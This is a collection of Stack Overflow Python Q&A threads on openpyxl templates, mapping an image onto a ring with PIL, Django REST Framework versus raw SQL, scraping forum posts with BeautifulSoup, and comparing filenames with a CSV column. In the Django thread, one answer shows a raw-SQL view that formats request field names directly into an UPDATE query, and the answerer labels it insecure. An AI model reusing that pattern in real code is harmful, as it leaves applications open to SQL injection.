| -2 | 2016-08-03T13:25:27Z | 38,745,135 | <p>You can use openpyxl to open a template file and then populate it with data and save it as something else to preserve the original template for use later. Check out this answer: <a href="http://stackoverflow.com/questions/38616207/store-data-which-is-an-output-of-python-program-in-excel-file/38616604#38616604">Working with Excel In Python</a></p>
| 0 | 2016-08-03T13:32:23Z | [
"python",
"excel"
] |
Preserve formatting when modifying an Excel (xlsx) file with Python | 38,744,952 | <p>Is there any Python module out there that can be used to create an Excel XLSX file replicating the format from a template?</p>
| -2 | 2016-08-03T13:25:27Z | 38,745,156 | <p>As far as I understand, <code>openpyxl</code> supports this. This is an example from the <a href="http://openpyxl.readthedocs.io/en/default/usage.html#write-a-workbook-from-xltx-as-xlsx" rel="nofollow">docs</a>:</p>
<pre><code>from openpyxl import load_workbook
wb = load_workbook('sample_book.xltx')
ws = wb.active
ws['D2'] = 42
wb.save('sample_book.xlsx')
</code></pre>
| 0 | 2016-08-03T13:33:12Z | [
"python",
"excel"
] |
Wrap image around a circle | 38,745,020 | <p>What I'm trying to do in this example is wrap an image around a circle, like below.</p>
<p><a href="http://i.stack.imgur.com/0vWEI.png"><img src="http://i.stack.imgur.com/0vWEI.png" alt="original"></a></p>
<p><a href="http://i.stack.imgur.com/B63uj.png"><img src="http://i.stack.imgur.com/B63uj.png" alt="wrapped"></a></p>
<p>To wrap the image I simply calculated the x,y coordinates using trig.
The problem is the calculated X and Y positions are rounded to make them integers. This causes the blank pixels seen in the wrapped image above. The x,y positions have to be integers because they are positions in lists.</p>
<p>I've done this again in the code following but without any images to make things easier to see. All I've done is create two arrays with binary values, one array is black the other white, then wrapped one onto the other.</p>
<p>The output of the code is:</p>
<p><a href="http://i.stack.imgur.com/9JDmM.png"><img src="http://i.stack.imgur.com/9JDmM.png" alt="example"></a></p>
<pre><code>import math as m
from PIL import Image # only used for showing output as image
width = 254.0
height = 24.0
Ro = 40.0
img = [[1 for x in range(int(width))] for y in range(int(height))]
cir = [[0 for x in range(int(Ro * 2))] for y in range(int(Ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("1", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
increment = m.radians(360 / width)
rad = Ro - 0.5
for i, row in enumerate(img):
hyp = rad - i
for j, column in enumerate(row):
alpha = j * increment
x = m.cos(alpha) * hyp + rad
y = m.sin(alpha) * hyp + rad
# put value from original image to its position in new image
cir[int(round(y))][int(round(x))] = img[i][j]
shom_im(cir)
</code></pre>
<p>I later found out about the Midpoint Circle Algorithm, but I had a worse result with that.</p>
<p><a href="http://i.stack.imgur.com/CVbUn.png"><img src="http://i.stack.imgur.com/CVbUn.png" alt="midpoint"></a></p>
<pre><code>from PIL import Image # only used for showing output as image
width, height = 254, 24
ro = 40
img = [[(0, 0, 0, 1) for x in range(int(width))]
for y in range(int(height))]
cir = [[(0, 0, 0, 255) for x in range(int(ro * 2))] for y in range(int(ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("RGBA", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
def putpixel(x0, y0):
global cir
cir[y0][x0] = (255, 255, 255, 255)
def drawcircle(x0, y0, radius):
x = radius
y = 0
err = 0
while (x >= y):
putpixel(x0 + x, y0 + y)
putpixel(x0 + y, y0 + x)
putpixel(x0 - y, y0 + x)
putpixel(x0 - x, y0 + y)
putpixel(x0 - x, y0 - y)
putpixel(x0 - y, y0 - x)
putpixel(x0 + y, y0 - x)
putpixel(x0 + x, y0 - y)
y += 1
err += 1 + 2 * y
if (2 * (err - x) + 1 > 0):
x -= 1
err += 1 - 2 * x
for i, row in enumerate(img):
rad = ro - i
drawcircle(int(ro - 1), int(ro - 1), rad)
shom_im(cir)
</code></pre>
<p>Can anybody suggest a way to eliminate the blank pixels? </p>
| 8 | 2016-08-03T13:27:57Z | 38,745,222 | <p>I think what you need is a noise filter. There are many implementations, of which I think a Gaussian filter would give a good result. You can find a list of filters <a href="http://pillow.readthedocs.io/en/3.1.x/reference/ImageFilter.html" rel="nofollow">here</a>. If it gets blurred too much:</p>
<ul>
<li>keep your first calculated image</li>
<li>calculate filtered image</li>
<li>copy fixed pixels from filtered image to first calculated image</li>
</ul>
<p>Here is a crude average filter written by hand:</p>
<pre><code>cir_R = int(Ro*2) # outer circle 2*r
inner_r = int(Ro - 0.5 - len(img)) # inner circle r
for i in range(1, cir_R-1):
for j in range(1, cir_R-1):
if cir[i][j] == 0: # missing pixel
dx = int(i-Ro)
dy = int(j-Ro)
pix_r2 = dx*dx + dy*dy # distance to center
if pix_r2 <= Ro*Ro and pix_r2 >= inner_r*inner_r:
cir[i][j] = (cir[i-1][j] + cir[i+1][j] + cir[i][j-1] +
cir[i][j+1])/4
shom_im(cir)
</code></pre>
<p>and the result:</p>
<p><a href="http://i.stack.imgur.com/4dhAF.png" rel="nofollow"><img src="http://i.stack.imgur.com/4dhAF.png" alt="enter image description here"></a></p>
<p>This basically scans between the two radii, checks for missing pixels, and replaces each with the average of the 4 pixels adjacent to it. In this black-and-white case they are all white.</p>
<p>Hope it helps!</p>
| 4 | 2016-08-03T13:35:31Z | [
"python",
"python-3.x",
"python-imaging-library"
] |
Wrap image around a circle | 38,745,020 | <p>What I'm trying to do in this example is wrap an image around a circle, like below.</p>
<p><a href="http://i.stack.imgur.com/0vWEI.png"><img src="http://i.stack.imgur.com/0vWEI.png" alt="original"></a></p>
<p><a href="http://i.stack.imgur.com/B63uj.png"><img src="http://i.stack.imgur.com/B63uj.png" alt="wrapped"></a></p>
<p>To wrap the image I simply calculated the x,y coordinates using trig.
The problem is the calculated X and Y positions are rounded to make them integers. This causes the blank pixels seen in the wrapped image above. The x,y positions have to be integers because they are positions in lists.</p>
<p>I've done this again in the code following but without any images to make things easier to see. All I've done is create two arrays with binary values, one array is black the other white, then wrapped one onto the other.</p>
<p>The output of the code is:</p>
<p><a href="http://i.stack.imgur.com/9JDmM.png"><img src="http://i.stack.imgur.com/9JDmM.png" alt="example"></a></p>
<pre><code>import math as m
from PIL import Image # only used for showing output as image
width = 254.0
height = 24.0
Ro = 40.0
img = [[1 for x in range(int(width))] for y in range(int(height))]
cir = [[0 for x in range(int(Ro * 2))] for y in range(int(Ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("1", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
increment = m.radians(360 / width)
rad = Ro - 0.5
for i, row in enumerate(img):
hyp = rad - i
for j, column in enumerate(row):
alpha = j * increment
x = m.cos(alpha) * hyp + rad
y = m.sin(alpha) * hyp + rad
# put value from original image to its position in new image
cir[int(round(y))][int(round(x))] = img[i][j]
shom_im(cir)
</code></pre>
<p>I later found out about the Midpoint Circle Algorithm, but I had a worse result with that.</p>
<p><a href="http://i.stack.imgur.com/CVbUn.png"><img src="http://i.stack.imgur.com/CVbUn.png" alt="midpoint"></a></p>
<pre><code>from PIL import Image # only used for showing output as image
width, height = 254, 24
ro = 40
img = [[(0, 0, 0, 1) for x in range(int(width))]
for y in range(int(height))]
cir = [[(0, 0, 0, 255) for x in range(int(ro * 2))] for y in range(int(ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("RGBA", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
def putpixel(x0, y0):
global cir
cir[y0][x0] = (255, 255, 255, 255)
def drawcircle(x0, y0, radius):
x = radius
y = 0
err = 0
while (x >= y):
putpixel(x0 + x, y0 + y)
putpixel(x0 + y, y0 + x)
putpixel(x0 - y, y0 + x)
putpixel(x0 - x, y0 + y)
putpixel(x0 - x, y0 - y)
putpixel(x0 - y, y0 - x)
putpixel(x0 + y, y0 - x)
putpixel(x0 + x, y0 - y)
y += 1
err += 1 + 2 * y
if (2 * (err - x) + 1 > 0):
x -= 1
err += 1 - 2 * x
for i, row in enumerate(img):
rad = ro - i
drawcircle(int(ro - 1), int(ro - 1), rad)
shom_im(cir)
</code></pre>
<p>Can anybody suggest a way to eliminate the blank pixels? </p>
| 8 | 2016-08-03T13:27:57Z | 38,819,423 | <p>You are having problems filling up your circle because you are approaching this from the wrong way - quite literally.</p>
<p>When mapping <em>from</em> a source <em>to</em> a target, you need to fill your <em>target</em>, and map each translated pixel from this into the <em>source</em> image. Then, there is no chance at all you miss a pixel, and, equally, you will never draw (nor lookup) a pixel more than once.</p>
<p>The following is a bit rough-and-ready, it only serves as a concept example. I first wrote some code to draw a filled circle, top to bottom. Then I added some more code to remove the center part (and added a variable <code>Ri</code>, for "inner radius"). This leads to a solid ring, where all pixels are only drawn once: top to bottom, left to right.</p>
<p><a href="http://i.stack.imgur.com/q6ekn.png" rel="nofollow"><img src="http://i.stack.imgur.com/q6ekn.png" alt="a solid ring"></a></p>
<p>How you exactly draw the ring is not actually important! I used trig at first because I thought of re-using the angle bit, but it can be done with Pythagorus' as well, and even with Bresenham's circle routine. All you need to keep in mind is that you iterate over the <em>target</em> rows and columns, not the <em>source</em>. This provides actual <code>x</code>,<code>y</code> coordinates that you can feed into the remapping procedure.</p>
<p>With the above done and working, I wrote the trig functions to translate <em>from</em> the coordinates I would put a pixel at <em>into</em> the original image. For this, I created a test image containing some text:</p>
<p><a href="http://i.stack.imgur.com/5sb4u.png" rel="nofollow"><img src="http://i.stack.imgur.com/5sb4u.png" alt="test image with text"></a></p>
<p>and a good thing that was, too, as in the first attempt I got the text twice (once left, once right) and mirrored â that needed a few minor tweaks. Also note the background grid. I added that to check if the 'top' and 'bottom' lines â the outermost and innermost circles â got drawn correctly.</p>
<p>Running my code with this image and <code>Ro</code>,<code>Ri</code> at 100 and 50, I get this result:</p>
<p><a href="http://i.stack.imgur.com/fIJco.png" rel="nofollow"><img src="http://i.stack.imgur.com/fIJco.png" alt="round test image"></a></p>
<p>You can see that the trig functions make it start at the rightmost point, move clockwise, and have the top of the image pointing outwards. All can be trivially adjusted, but this way it mimics the orientation that you want your image drawn.</p>
<p>This is the result with your iris-image, using <code>33</code> for the inner radius:</p>
<p><a href="http://i.stack.imgur.com/BUcjW.png" rel="nofollow"><img src="http://i.stack.imgur.com/BUcjW.png" alt="iris to eye mapping"></a></p>
<p>and here is a nice animation, showing the stability of the mapping:</p>
<p><a href="http://i.stack.imgur.com/uUcEZ.gif" rel="nofollow"><img src="http://i.stack.imgur.com/uUcEZ.gif" alt="aww bright light ahead!"></a></p>
<p>Finally, then, my code is:</p>
<pre><code>import math as m
from PIL import Image
Ro = 100.0
Ri = 50.0
# img = [[1 for x in range(int(width))] for y in range(int(height))]
cir = [[0 for x in range(int(Ro * 2))] for y in range(int(Ro * 2))]
# image = Image.open('0vWEI.png')
image = Image.open('this-is-a-test.png')
# data = image.convert('RGB')
pixels = image.load()
width, height = image.size
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("RGB", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.save("result1.png","PNG")
new_image.show()
for i in range(int(Ro)):
# outer_radius = Ro*m.cos(m.asin(i/Ro))
outer_radius = m.sqrt(Ro*Ro - i*i)
for j in range(-int(outer_radius),int(outer_radius)):
if i < Ri:
# inner_radius = Ri*m.cos(m.asin(i/Ri))
inner_radius = m.sqrt(Ri*Ri - i*i)
else:
inner_radius = -1
if j < -inner_radius or j > inner_radius:
# this is the destination
# solid:
# cir[int(Ro-i)][int(Ro+j)] = (255,255,255)
# cir[int(Ro+i)][int(Ro+j)] = (255,255,255)
# textured:
x = Ro+j
y = Ro-i
# calculate source
angle = m.atan2(y-Ro,x-Ro)/2
distance = m.sqrt((y-Ro)*(y-Ro) + (x-Ro)*(x-Ro))
distance = m.floor((distance-Ri+1)*(height-1)/(Ro-Ri))
# if distance >= height:
# distance = height-1
cir[int(y)][int(x)] = pixels[int(width*angle/m.pi) % width, height-distance-1]
y = Ro+i
# calculate source
angle = m.atan2(y-Ro,x-Ro)/2
distance = m.sqrt((y-Ro)*(y-Ro) + (x-Ro)*(x-Ro))
distance = m.floor((distance-Ri+1)*(height-1)/(Ro-Ri))
# if distance >= height:
# distance = height-1
cir[int(y)][int(x)] = pixels[int(width*angle/m.pi) % width, height-distance-1]
shom_im(cir)
</code></pre>
<p>The commented-out lines draw a solid white ring. Note the various tweaks here and there to get the best result. For instance, the <code>distance</code> is measured from the center of the ring, and so returns a low value for close to the center and the largest values for the outside of the circle. Mapping that directly back onto the target image would display the text with its top "inwards", pointing to the inner hole. So I inverted this mapping with <code>height - distance - 1</code>, where the <code>-1</code> is to make it map from <code>0</code> to <code>height</code> again.</p>
<p>A similar fix is in the calculation of <code>distance</code> itself; without the tweaks <code>Ri+1</code> and <code>height-1</code> either the innermost or the outermost row would not get drawn, indicating that the calculation is just one pixel off (which was exactly the purpose of that grid).</p>
| 4 | 2016-08-07T23:13:30Z | [
"python",
"python-3.x",
"python-imaging-library"
] |
Using Models in Django-Rest Framework | 38,745,067 | <p>I am new to Django-Rest Framework and I wanted to develop API calls.
I am currently using a MySQL database, so if I have to make changes in the database, do I have to write models in my project, or can I execute raw SQL operations directly against my database?</p>
<p>For example: my urls.py file contains a list of URLs, and if any of those URLs is hit it directly calls the corresponding view function in views.py; in that function I do the particular operation, like connecting to the MySQL database, executing SQL queries, and returning a JSON response to the front end.</p>
<p>Is this a good approach to making API calls? If not Please guide me.</p>
<p>Any advice or help will be appreciated.</p>
| 0 | 2016-08-03T13:29:40Z | 38,746,370 | <p>you don't <em>need</em> to use models, but you really should. django's ORM (the way it handles reading/writing to databases) functionality is fantastic and really useful. </p>
<p>if you're executing raw sql statements all the time, you either have a highly specific case where django's functions fail you, or you're using django inefficiently and should rethink why you're using django to begin with.</p>
| 2 | 2016-08-03T14:24:39Z | [
"python",
"django",
"django-rest-framework"
] |
Using Models in Django-Rest Framework | 38,745,067 | <p>I am new to Django-Rest Framework and I wanted to develop API calls.
I am currently using a MySQL database, so if I have to make changes in the database, do I have to write models in my project, or can I execute raw SQL operations directly against my database?</p>
<p>For example: my urls.py file contains a list of URLs, and if any of those URLs is hit it directly calls the corresponding view function in views.py; in that function I do the particular operation, like connecting to the MySQL database, executing SQL queries, and returning a JSON response to the front end.</p>
<p>Is this a good approach to making API calls? If not Please guide me.</p>
<p>Any advice or help will be appreciated.</p>
| 0 | 2016-08-03T13:29:40Z | 38,750,038 | <p>Django REST Framework is designed to work with Django Framework. And Django ORM is an integral part of Django Framework. Granted, that it is possible to use Django and DRF without using ORM, but you will be basically fighting against the framework instead of using the framework to help you. So, you have three basic approaches.</p>
<ol>
<li><p>If all you want is to develop RESTful APIs in python and pull data from an existing MySQL database or you don't have a database, but you want something simple. You can use something framework agnostic, like restless (<a href="http://restless.readthedocs.io/en/latest/" rel="nofollow">http://restless.readthedocs.io/en/latest/</a>) or even hug (<a href="https://github.com/timothycrosley/hug" rel="nofollow">https://github.com/timothycrosley/hug</a>)</p></li>
<li><p>If you do not have any existing data and you want a full blown web framework, you should consider using Django (I make my living as a Django dev, there is no shame in this) and embrace the ORM. In this case, DRF is one of the better REST frameworks for Django at the moment.</p></li>
<li><p>If you have existing database and are somehow stuck with using Django, there are some ways to use Django ORM with existing data, you should look at Django docs on the topic (<a href="https://docs.djangoproject.com/en/1.9/howto/legacy-databases/" rel="nofollow">https://docs.djangoproject.com/en/1.9/howto/legacy-databases/</a>)</p></li>
</ol>
| 0 | 2016-08-03T17:21:45Z | [
"python",
"django",
"django-rest-framework"
] |
Using Models in Django-Rest Framework | 38,745,067 | <p>I am new to Django-Rest Framework and I wanted to develop API calls.
I am currently using a MySQL database, so if I have to make changes in the database, do I have to write models in my project, or can I execute raw SQL operations directly against my database?</p>
<p>For example: my urls.py file contains a list of URLs, and if any of those URLs is hit it directly calls the corresponding view function in views.py; in that function I do the particular operation, like connecting to the MySQL database, executing SQL queries, and returning a JSON response to the front end.</p>
<p>Is this a good approach to making API calls? If not Please guide me.</p>
<p>Any advice or help will be appreciated.</p>
| 0 | 2016-08-03T13:29:40Z | 38,750,758 | <p>Why would you use Django without hitting the database with the ORM? Most of the times the ORM works as you'd expect, and even allow you to perform searches like this:</p>
<pre><code>class Foo(models.Model):
code = models.CharField(max_length=10, ...)
class Bar(models.Model):
code = models.CharField(max_length=10, ...)
foo = models.ForeignKey(Foo, ...)
</code></pre>
<p>And perform a query like this:</p>
<pre><code>Bar.objects.get(code='baz', foo_code='bat')
</code></pre>
<p>Which would be the same, but better, than:</p>
<pre><code>select bar.* from yourapp_bar bar inner join yourapp_foo foo on (bar.foo_id = foo.id) where bar.code = 'baz' and foo.code = 'bat'
</code></pre>
<p>Shorter and more maintainable.</p>
<p>Now, speaking about Django Rest Framework and Django in general: Although the latter modifications to both Django and DRF involve you cannot suddenly expect nested objects be created in the same moment the parent objects are (e.g. Foo is parent, while Bar is nested), as it happens in relation managers (Django) and create/update methods in the <code>ModelSerializer</code> class, you can still trust Django to save your time, effort, and life by using it instead of SQL.</p>
<p>I will give you an example with DRF. We will assume only Foo models are involved here. Which one would you prefer?</p>
<pre><code># yourapp.urls
from .views import UserViewSet
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
router.register(r'users', UserViewSet)
urlpatterns = router.urls
# yourapp.views
class FooViewSet(viewsets.ModelViewSet):
"""
A viewset that provides the standard actions for
a single foo element
"""
queryset = Foo.objects.all()
serializer_class = FooSerializer
# I am assuming you created the FooSerializer to map certain fields...
</code></pre>
<p>or ...</p>
<pre><code># yourapp.urls
from .views import mywholeurl
from django.conf.urls import url
urlpatterns = [
url('users/(\d+)', mywholeview),
]
# yourapp.views
from django.db import connection
from rest_framework import status
from rest_framework.response import Response
def mywholeview(request, id):
cursor = connection.cursor()
if request.method in ('POST', 'PUT'):
cursor.execute('update yourapp_foo set %s where id = %%s' % ', '.join(["%s=%%s" % p[0] for p in request.data.items()]), list(p[1] for p in request.data.items()) + [id])
row = cursor.fetchone()
if row[0]:
return Response(status=status.HTTP_201_ACCEPTED)
else:
return Response(status=status.HTTP_404_NOT_FOUND)
elif request.method == 'GET':
cursor.execute('select * from yourapp_foo where id = %s', [id])
row = cursor.fetchone()
if row:
columns = [col[0] for col in cursor.description]
data = zip(columns, row)
return Response(data, status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_404_NOT_FOUND)
elif request.method == 'DELETE':
cursor.execute('delete from yourapp_foo where id = %s', [id])
row = cursor.fetchone()
if not int(row[0]):
return Response(status=status.HTTP_404_NOT_FOUND)
else:
return Response(status=status.HTTP_204_NO_CONTENT)
</code></pre>
<p><em>the latter code is untested and only serves for teoretical purpose. it is pretty insecure and not intended to be executed in production since it is a bad idea</em></p>
<p>I would prefer with the shortest approach.</p>
<p>My conclusion is: learn the ORM! If you need to respect your database because it is preexisting, you could use <code>managed</code> models. But always... use the ORM and the features given to you by both Django and DRF.</p>
| 0 | 2016-08-03T18:05:45Z | [
"python",
"django",
"django-rest-framework"
] |
Web Scraping a Forum Post in Python Using Beautiful soup and lxml Cannot get all posts | 38,745,080 | <p>I'm having an issue that is driving me absolutely crazy. I am a newbie to web scraping, and I am practicing web scraping by trying to scrape the contents of a forum post, namely the actual posts people made. I have isolated the posts to what I think contains the text, which is div id="post_message_2793649" (see attached Screenshot_1 for a better representation of the html)<a href="http://i.stack.imgur.com/6L3zf.png" rel="nofollow">Screenshot_1</a></p>
<p>The example above is just one of many posts. Each post has its own unique identifier number, but the rest is consistent as div id="post_message_.</p>
<p>here is what I am stuck at currently</p>
<pre><code>import requests
from bs4 import BeautifulSoup
import lxml
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one- billion-2016-a-120.html')
soup = BeautifulSoup(r.content)
data = soup.find_all("td", {"class": "alt1"})
for link in data:
print(link.find_all('div', {'id': 'post_message'}))
</code></pre>
<p>the above code just creates a bunch of empty lists that go down the page its so frustrating. (See Screenshot_2 for the code that I ran with its output next to it)
<a href="http://i.stack.imgur.com/nBcOl.png" rel="nofollow">Screenshot_2</a>
What am I missing.</p>
<p>The end result that I am looking for is just all the contents of what people said contained in a long string without any of the html clutter. </p>
<p>I am using Beautiful Soup 4 running the lxml parser </p>
| 0 | 2016-08-03T13:30:18Z | 38,745,900 | <p>There's nothing with the id <code>post_message</code>, so <code>link.find_all</code> returns an empty list. You'll first want to grab all of the ids within all the <code>div</code>s, and then filter that list of ids with a regex (e.g.) to get only those that start with <code>post_message_</code> and then a number. Then you can do</p>
<pre><code>for message_id in message_ids:
print(link.find_all('div', {'id': message_id}))
</code></pre>
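<p>The id filtering described above might look like this (the list of ids here is made up for illustration):</p>

```python
import re

# Hypothetical ids collected from the page's div tags (illustration only)
ids = ['post_message_2793649', 'navbar', 'post_message_2793650', 'postmenu_1']

# keep only ids that are 'post_message_' followed by a number
pattern = re.compile(r'^post_message_\d+$')
message_ids = [i for i in ids if pattern.match(i)]
print(message_ids)  # ['post_message_2793649', 'post_message_2793650']
```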
| 0 | 2016-08-03T14:04:51Z | [
"python",
"web-scraping",
"beautifulsoup",
"lxml"
] |
Web Scraping a Forum Post in Python Using Beautiful soup and lxml Cannot get all posts | 38,745,080 | <p>I'm having an issue that is driving me absolutely crazy. I am a newbie to web scraping, and I am practicing web scraping by trying to scrape the contents of a forum post, namely the actual posts people made. I have isolated the posts to what I think contains the text, which is div id="post_message_2793649" (see attached Screenshot_1 for a better representation of the html)<a href="http://i.stack.imgur.com/6L3zf.png" rel="nofollow">Screenshot_1</a></p>
<p>The example above is just one of many posts. Each post has its own unique identifier number, but the rest is consistent as div id="post_message_.</p>
<p>here is what I am stuck at currently</p>
<pre><code>import requests
from bs4 import BeautifulSoup
import lxml
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one- billion-2016-a-120.html')
soup = BeautifulSoup(r.content)
data = soup.find_all("td", {"class": "alt1"})
for link in data:
print(link.find_all('div', {'id': 'post_message'}))
</code></pre>
<p>the above code just creates a bunch of empty lists that go down the page its so frustrating. (See Screenshot_2 for the code that I ran with its output next to it)
<a href="http://i.stack.imgur.com/nBcOl.png" rel="nofollow">Screenshot_2</a>
What am I missing.</p>
<p>The end result that I am looking for is just all the contents of what people said contained in a long string without any of the html clutter. </p>
<p>I am using Beautiful Soup 4 running the lxml parser </p>
| 0 | 2016-08-03T13:30:18Z | 38,747,669 | <p>You have a couple of issues, the first being you have multiple spaces in the url so you are not going to the page you think you are:</p>
<pre><code>In [47]: import requests
In [48]: r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one- billion-2016-a-120.html')
In [49]: r.url # with spaces
Out[49]: 'http://www.catforum.com/forum/'
In [50]: r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
In [51]: r.url # without spaces
Out[51]: 'http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html'
</code></pre>
<p>The next issue is the <em>id's</em> start with <em>post_message</em>, none are equal to <em>post_message</em> exactly, you can use a css selector that will match id's starting with <em>post_message</em> to pull all the divs you want, then just extract the text:</p>
<pre><code>r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
soup = BeautifulSoup(r.text)
for div in soup.select('[id^=post_message]'):
print(div.get_text("\n", strip=True))
</code></pre>
<p>Which will give you:</p>
<pre><code>11311301
Did you get the cortisone shots? Will they have to remove it?
My Dad and stepmom got a new Jack Russell! Her name's Daisy. She's 2 years old, and she's a rescue(d) dog. She was rescued from an abusive situation. She can't stand noise, and WILL NOT allow herself to be picked up. They're working on that. Add to that the high-strung, hyper nature of a Jack Russell... But they love her. When I called last night, Pat was trying to teach her 'sit'!
11302
Well, I tidied, cleaned, and shopped. Rest of the list isn't done and I'm too tired and way too hot to care right now.
Miss Luna is howling outside the Space Kitten's room because I let her out and gave them their noms. SHE likes to gobble their food.....little oink.
11303
Daisy sounds like she has found a perfect new home and will realize it once she feels safe.
11304
No, Kurt, I haven't gotten the cortisone shot yet. They want me to rest it for three weeks first to see if that helps. Then they would try a shot and remove it if the shot doesn't work. It might feel a smidge better today but not much.
So have you met Daisy in person yet? She sounds like a sweetie.
And Carrie, Amelia is a piggie too. She eats the dog food if I don't watch her carefully!
11305
I had a sore neck yesterday morning after turning it too quickly. Applied heat....took an anti-inflammatory last night. Thought I'd wake up feeling better....nope....still hurts. Grrrrrrrr.
11306
MM- Thanks for your welcome to the COUNTING thread. Would have been better if I remembered to COUNT. I've been a long time lurker on the thread but happy now to get involved in the chat.
Hope your neck is feeling better. Lily and Lola are reminding me to say 'hello' from them too.
11307
Welcome back anniegirl and Lily and Lola! We didn't scare you away! Yeah!
Nightmare afternoon. My SIL was in a car accident and he car pools with my daughter. So, in rush hour, I have to drive an hour into Vancouver to get them (I hate rush hour traffic....really hate it). Then an hour back to their place.....then another half hour to get home. Not good for the neck or the nerves (I really hate toll bridges and driving in Vancouver and did I mention rush hour traffic). At least he is unharmed. Things we do for love of our children!
11308. Hi annegirl! None of us can count either - you'll fit right in.
MM, yikes how scary. Glad he's ok, but that can't have been fun having to do all that driving, especially with an achy neck.
I note that it's the teachers on this thread whose bodies promptly went down...coincidentally once the school year was over...
DebS, how on earth are you supposed to rest your foot for 3 weeks, short of lying in bed and not moving?
MM, how is your shoulder doing? And I missed the whole goodbye to Pyro.
Gah, I hope it slowly gets easier over time as you remember that they're going to families who will love them.
I'm finally not constantly hungry, just nearly constantly.
My weight had gone under 100 lbs
so I have quite a bit of catching up to do. Because of the partial obstruction I had after the surgery, the doctor told me to try to stay on a full liquid diet for a week. I actually told him no, that I was hungry, lol. So he told me to just be careful. I have been, mostly (bacon has entered the picture 3 times in the last 3 days
) and the week expired today, so I'm off to the races.
11309
Welcome to you, annegirl, along with Lily and Lola! We always love having new friends on our counting thread.
And Spirite, good to hear from you and I'm glad you are onto solid foods.
11310
DebS and Spirite thank you too for the Welcome. Oh MM what an ordeal with your daughter but glad everyone us on.
DevS - hope your foot is improving Its so horrible to be in pain.
Spirite - go wild on the bacon and whatever else you fancy. I'm making a chocolate orange cheese cake to bring to a dinner party this afternoon. It has so much marscapone in it you put on weight just looking at it.
</code></pre>
<p>If you wanted to use <em>find_all</em>, you would need to use a regex:</p>
<pre><code>import re
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
soup = BeautifulSoup(r.text)
for div in soup.find_all(id=re.compile("^post_message")):
print(div.get_text("\n", strip=True))
</code></pre>
<p>The result will be the same.</p>
| 0 | 2016-08-03T15:21:20Z | [
"python",
"web-scraping",
"beautifulsoup",
"lxml"
] |
How can I make a plot appear in a new window, such that I can inspect it (zoom in etc.)? | 38,745,103 | <p><img src="http://i.stack.imgur.com/5XoHV.png" alt="Codeplot">
I wrote the code above and it shows my plot in the IPython console. However, I want to inspect the plot, i.e. be able to zoom in/out and have coordinates displayed when moving my cursor.</p>
<p>I know I can do this by executing the file from the location where it is saved. But is there a way to immediately show the plot in a new window when running my file in Spyder?</p>
| 0 | 2016-08-03T13:31:09Z | 38,745,347 | <p>I see that you have <code>pyplot</code> already imported. Run the following in your console:</p>
<pre><code>plt.switch_backend('qt4agg')
</code></pre>
<p>If this does not work because the name <code>plt</code> is not recognized, import it in the console:</p>
<pre><code>from matplotlib import pyplot as plt
</code></pre>
| 0 | 2016-08-03T13:40:50Z | [
"python",
"plot",
"show",
"interactive"
] |
Match identical words in two prints | 38,745,163 | <p>I am using os to list the filenames within a directory. I am also using pandas to list the contents of one column in a CSV file. I have printed the results of both and now I want to match the names that appear in both prints and also identify which names are exclusive to one print. Below is my code which gets the names and the contents of the CSV file. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mydir/csvfile"
dirs = os.listdir( path )
for file in dirs:
print file
fields = ['Column']
df = pd.read_csv('/mydir/csv_file', skipinitialspace=True, usecols=fields)
print df.Column
</code></pre>
<p><strong>* EDIT *</strong></p>
<p>I have come up with this solution that works. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mdir/csvfile"
dirs = os.listdir( path )
list_1 = [file for file in dirs]
fields = ['column']
df = pd.read_csv('/mydir/csvfile', skipinitialspace=True, usecols=fields)
list_2 = df.column.values.tolist()
list_3=[]
for i in list_1:
if i in list_2:
list_3.append(i + " True")
else:
list_3.append(i + " False")
print list_3
</code></pre>
| 2 | 2016-08-03T13:33:19Z | 38,745,667 | <p>So as I understand it you have two lists. One from the directory and another from a column in Pandas. You want the elements that are in both lists as well as the elements that are unique to each list. Lets say your lists are like this:</p>
<pre><code>List1 = ['a' , 'b' , 'c' , 'd', 'e', 'f']
List2 = ['c' , 'd' , 'e' , 'f' , 'g' , 'h' , 'i']
</code></pre>
<p>Then your code to produce what I think you want could use list comprehensions and go like this:</p>
<pre><code>overlap = [i for i in List1 if i in List2]
nonOverlapList1 = [j for j in List1 if j not in overlap]
nonOverlapList2 = [k for k in List2 if k not in overlap]
</code></pre>
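<p>If the order of the results doesn't matter, the same three lists fall out of set operations (sorted here only to make the output deterministic):</p>

```python
# Same overlap/difference computation with sets; sets do not preserve
# order, so results are sorted only to make the output stable.
List1 = ['a', 'b', 'c', 'd', 'e', 'f']
List2 = ['c', 'd', 'e', 'f', 'g', 'h', 'i']

overlap = sorted(set(List1) & set(List2))
only_in_1 = sorted(set(List1) - set(List2))
only_in_2 = sorted(set(List2) - set(List1))

print(overlap)    # ['c', 'd', 'e', 'f']
print(only_in_1)  # ['a', 'b']
print(only_in_2)  # ['g', 'h', 'i']
```

<p>For large lists this is also considerably faster, since each membership test against a set is O(1) on average instead of a linear scan.</p>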
| 1 | 2016-08-03T13:55:01Z | [
"python",
"csv",
"pandas"
] |
